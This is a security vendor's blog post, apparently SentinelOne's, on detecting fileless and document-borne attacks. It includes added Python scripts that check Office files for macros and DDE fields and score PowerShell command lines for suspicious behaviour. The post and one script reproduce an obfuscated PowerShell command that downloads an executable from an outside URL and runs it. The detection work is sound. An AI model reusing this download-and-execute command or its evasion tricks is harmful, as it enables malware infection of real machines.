SentinelOne's H1 2018 Enterprise Risk Index Report shows that fileless-based attacks rose by 94%. In a previous post, we talked about what fileless malware is, how it changes the way we treat cyber threats, and how it affects the enterprise. In this post, we will cover how fileless-based attacks are detected and mitigated by the SentinelOne agent.
Traditionally, AV and other endpoint security products have focused on files (executables) to detect and prevent malware. There are several advantages to this. Files can be hashed, queried in reputation services, examined by both static analysis and machine learning, and easily excluded for false detections.
These advantages create a problem for attackers. The name of the game is monetary gain: threat actors aim for cost-effectiveness, seeking the highest return for the least amount of effort. Yet the rewards for creating and delivering file-based malware diminish as soon as it ends up on public feeds. If the malware's signature is detected two days after release, the attacker's ROI (return on investment) may be significantly less than expected, or even negligible.
Over the past few years, threat actors have increasingly turned to fileless malware as a highly effective alternative.
Malware Hidden in Documents Is Also a Fileless-based Attack
Beyond the fileless-based attack that abuses legitimate system files to run malicious code, another common type of attack that is considered fileless is malware hidden within documents. Although such data files are not supposed to run code, there are vulnerabilities in Microsoft Office and PDF readers that adversaries can exploit to obtain code execution. For example, an infected document could trigger a malicious PowerShell command. There are also a few built-in features that allow code execution from within documents, such as macros and the DDE (Dynamic Data Exchange) attack.
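The features that turn a data file into a code-execution vector leave traces inside the file itself, which is what a mail gateway or endpoint scanner can look for before the user is ever asked to click "Yes". The following Python script is an added example, not part of the original post and not SentinelOne's code: it opens an Office Open XML (.docx/.docm) archive and reports whether it carries a VBA project or a DDE field, the two built-in mechanisms named above. The three documents it inspects are constructed in memory as minimal test fixtures (not valid Word files, just enough structure for the check), and the DDE field's target program and arguments are placeholders.

```python
import io
import re
import zipfile

# A Word file is a ZIP archive. Macros live in word/vbaProject.bin (xl/ and
# ppt/ for Excel and PowerPoint); DDE fields are field codes inside the XML.
MACRO_PART = re.compile(r"^(word|xl|ppt)/vbaProject\.bin$", re.I)
XML_PART = re.compile(r"\.xml$", re.I)
DDE_FIELD = re.compile(r"\bDDE(AUTO)?\b", re.I)
INSTR_RUN = re.compile(r"<w:instrText[^>]*>(.*?)</w:instrText>", re.S)
SIMPLE_FIELD = re.compile(r'w:instr="([^"]*)"')


def inspect_office_document(data: bytes) -> dict:
    """Report which code-execution features an OOXML document carries."""
    findings = {"macro": False, "dde": False, "dde_fields": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if MACRO_PART.match(name):
                findings["macro"] = True
            elif XML_PART.search(name):
                text = zf.read(name).decode("utf-8", errors="replace")
                # Field code text is often split across several <w:instrText>
                # runs; join them so the keyword is seen whole even when split.
                instr = "".join(INSTR_RUN.findall(text))
                # Simple fields carry the code in the w:instr attribute instead.
                instr += " " + " ".join(SIMPLE_FIELD.findall(text))
                for m in DDE_FIELD.finditer(instr):
                    findings["dde"] = True
                    findings["dde_fields"].append(instr[m.start():m.start() + 60].strip())
    return findings


def risk_label(findings: dict) -> str:
    """Collapse the findings into a one-word verdict for a pipeline."""
    if findings["macro"] and findings["dde"]:
        return "macro+dde"
    if findings["macro"]:
        return "macro"
    if findings["dde"]:
        return "dde"
    return "clean"


def build_sample_docx(parts: dict) -> bytes:
    """Constructed fixture: a minimal ZIP with the given member names/contents."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in parts.items():
            zf.writestr(name, content)
    return buf.getvalue()


BODY = '<w:document><w:body><w:p>{}</w:p></w:body></w:document>'

# Constructed sample documents (not real files from the post).
CLEAN_DOC = build_sample_docx({
    "[Content_Types].xml": "<Types/>",
    "word/document.xml": BODY.format("<w:r><w:t>Quarterly report</w:t></w:r>"),
})
MACRO_DOC = build_sample_docx({
    "[Content_Types].xml": "<Types/>",
    "word/document.xml": BODY.format("<w:r><w:t>Enable content to view</w:t></w:r>"),
    # Placeholder bytes standing in for an OLE container with VBA streams.
    "word/vbaProject.bin": b"\xd0\xcf\x11\xe0 placeholder OLE container",
})
DDE_DOC = build_sample_docx({
    "[Content_Types].xml": "<Types/>",
    "word/document.xml": BODY.format(
        '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
        '<w:r><w:instrText xml:space="preserve"> DDEAUTO </w:instrText></w:r>'
        '<w:r><w:instrText xml:space="preserve">"placeholder-program" "placeholder-args"</w:instrText></w:r>'
        '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
    ),
})

if __name__ == "__main__":
    for label, doc in (("clean", CLEAN_DOC), ("macro", MACRO_DOC), ("dde", DDE_DOC)):
        f = inspect_office_document(doc)
        print(f"{label:5s} -> {risk_label(f):9s} {f}")
```

A real pipeline would feed the verdict into the same place an attachment filter or sandbox result goes; the point of the check is that neither a macro nor a DDE field can be hidden from it by case changes or by splitting the field code across runs.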
Detection and Mitigation Walkthrough
Let's walk through a flow where the user has received a Word document via encrypted email. The user knows the sender and therefore downloads the document to the Desktop and opens it. On opening the file, the user sees the following:
Once “Yes” is clicked, the attack is rolling. Let’s see what the SentinelOne agent detects (running in Detect mode for this example).
The administrator can examine exactly how each element involved in this story contributed to the attack.
SentinelOne displays the exact command line invoking the PowerShell command:
-ExECUtiONpOlIcy BYpAsS -NoPROfILE -WInDOWSTYLe HIdDEN (neW-oBJeCT SysTem.NeT.weBcliENT).doWNlOADfilE('http://v32gy.worldnews932.ru/file/nit.nbv','C:\Users\admin\AppData\Roaming.exE');START-proceSS 'C:\Users\admin\AppData\Roaming.exE'
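The command line above is perfectly readable once case is ignored, and that is also how a detection rule should treat it: the random capitalisation only defeats exact string matching. The following Python script is an added example, not SentinelOne's code and not from the original post. It scores PowerShell command lines, as recorded by process-creation auditing or an EDR, against the behaviours this one shows: execution-policy bypass, hidden window, no profile, a download cradle, launching the dropped file, and the case randomisation itself. The first sample is the command line from the post; the other three are constructed, with a placeholder standing in for any encoded payload, and the weights and thresholds are assumptions for illustration.

```python
import re

# Behaviours worth alerting on in a PowerShell command line:
# (name, case-insensitive regex, weight). Because matching ignores case, the
# mixed capitalisation in the post's sample buys the attacker nothing.
# Weights and thresholds are illustrative assumptions, not vendor values.
INDICATORS = [
    ("execution_policy_bypass", re.compile(r"-ex\w*\s+bypass", re.I), 2),
    ("hidden_window",           re.compile(r"-w\w*\s+hidden", re.I), 2),
    ("no_profile",              re.compile(r"-nop\w*", re.I), 1),
    ("encoded_command",         re.compile(r"-e(c|nc\w*)\b", re.I), 2),
    ("download_cradle",         re.compile(
        r"net\.webclient|downloadfile|downloadstring|invoke-webrequest|\biwr\b", re.I), 3),
    ("invoke_expression",       re.compile(r"invoke-expression|\biex\b", re.I), 2),
    ("spawns_process",          re.compile(r"start-process", re.I), 1),
    ("remote_url",              re.compile(r"https?://", re.I), 1),
    ("writes_to_appdata",       re.compile(r"\\appdata\\", re.I), 1),
]
ALERT_THRESHOLD = 5   # total weight at which a line is flagged
CASE_THRESHOLD = 0.3  # internal upper-case ratio that counts as randomised casing

WORD = re.compile(r"[A-Za-z]{4,}")


def case_randomisation_ratio(cmdline: str) -> float:
    """Share of upper-case letters in non-initial positions of words.

    Words that are entirely upper case (acronyms, constants) are skipped.
    Ordinary PascalCase parameters such as -ExecutionPolicy score well under
    0.1; randomised casing such as 'ExECUtiONpOlIcy' scores around 0.4+.
    """
    internal = uppers = 0
    for word in WORD.findall(cmdline):
        if word.isupper():
            continue
        body = word[1:]
        internal += len(body)
        uppers += sum(1 for c in body if c.isupper())
    return uppers / internal if internal else 0.0


def analyse(cmdline: str) -> dict:
    """Score one command line and list which indicators fired."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(cmdline)]
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    ratio = case_randomisation_ratio(cmdline)
    if ratio >= CASE_THRESHOLD:
        hits.append("case_randomisation")
        score += 2
    return {"score": score, "indicators": hits,
            "case_ratio": round(ratio, 2), "suspicious": score >= ALERT_THRESHOLD}


SAMPLE_CMDLINES = [
    # 1. The command line shown in the post, copied as-is.
    r"-ExECUtiONpOlIcy BYpAsS -NoPROfILE -WInDOWSTYLe HIdDEN (neW-oBJeCT SysTem.NeT.weBcliENT).doWNlOADfilE('http://v32gy.worldnews932.ru/file/nit.nbv','C:\Users\admin\AppData\Roaming.exE');START-proceSS 'C:\Users\admin\AppData\Roaming.exE'",
    # 2. Constructed benign scheduled-task invocation.
    r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\Backup.ps1",
    # 3. Constructed deployment pattern: bypass and no profile, but no cradle or hidden window.
    r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\ProgramData\Deploy\install.ps1",
    # 4. Constructed: hidden window plus encoded command; payload replaced by a placeholder.
    r"powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand <base64-payload-placeholder>",
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        r = analyse(line)
        flag = "ALERT" if r["suspicious"] else "ok   "
        print(f"{flag} score={r['score']:2d} case={r['case_ratio']} {r['indicators']}")
```

Sample 3 is the reason for weighting rather than matching single flags: `-ExecutionPolicy Bypass` with `-NoProfile` is common in legitimate deployment tooling and scores 3, below the threshold, while the post's command line stacks eight indicators and scores 13. The ratio metric is deliberately separate from the keyword list so that it also raises the score on a cradle the regexes have not seen before.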
In a real-life scenario, the SentinelOne agent immediately mitigates the issue. This happens automatically, without the need for the administrator to take any action. The administrator is notified by SMS, SIEM or email.
Too many security solutions rely on a thin layer of trust: passing over so-called reliable or reputable software to focus on unknown or untrusted files and applications. Relying on "who it's from" rather than "what it's doing" is a flawed strategy that opens the door to supply chain attacks. This is where the SentinelOne solution, based on behavioral AI detection and layered security, really shines – covering exploits, macro documents, exploit kits, PowerShell, PowerSploit, and zero-day vulnerabilities locally, without impacting your employees' day-to-day productivity.